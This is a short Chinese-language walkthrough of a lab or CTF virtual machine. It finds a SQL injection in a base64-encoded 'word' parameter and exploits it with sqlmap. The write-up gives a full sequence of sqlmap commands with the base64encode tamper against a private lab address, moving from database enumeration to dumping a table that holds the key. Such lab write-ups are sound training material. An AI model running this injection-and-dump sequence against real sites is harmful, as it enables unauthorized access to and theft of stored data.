第二个虚拟机打开是这样的,
点击order by ranking,发现有一个word参数,参数后面的我们很容易可以看出是base64加密,
这里解密来一波,
很明显是sql查询语句,于是博主直接扔sqlmap跑去了,
检测到word参数有注入点,但是传入的参数都是base64处理过的,于是我们直接导入sqlmap中那个的tamper,base64encode这个模块
检测数据库

1 python sqlmap.py -u http://192.168.5.156/index.php?word=U0VMRUNUKyUyQStGUk9NK2xhbmd1YWdlK29yZGVyK2J5K3JhbmtpbmcrbGltaXQrMCUyQzQ= --tamper=base64encode --level 5
跑出来四个数据库
有一个数据库与其他数据库格格不入,很明显second就是我们的目标了
下一步,检测数据表

1 python sqlmap.py -u http://192.168.5.156/index.php?word=U0VMRUNUKyUyQStGUk9NK2xhbmd1YWdlK29yZGVyK2J5K3JhbmtpbmcrbGltaXQrMCUyQzQ= --tamper=base64encode --level 5 -D second --tables
跑出来一个language表
下一步,检测表下面的列名,有三个列名

1 python sqlmap.py -u http://192.168.5.156/index.php?word=U0VMRUNUKyUyQStGUk9NK2xhbmd1YWdlK29yZGVyK2J5K3JhbmtpbmcrbGltaXQrMCUyQzQ= --tamper=base64encode --level 5 -D second -T language --columns
下一步,根据列名dump出有效信息

1 python sqlmap.py -u http://192.168.5.156/index.php?word=U0VMRUNUKyUyQStGUk9NK2xhbmd1YWdlK29yZGVyK2J5K3JhbmtpbmcrbGltaXQrMCUyQzQ= --tamper=base64encode --level 5 -D second -T language -C year,language,ranking --dump
ok,成功拿到Key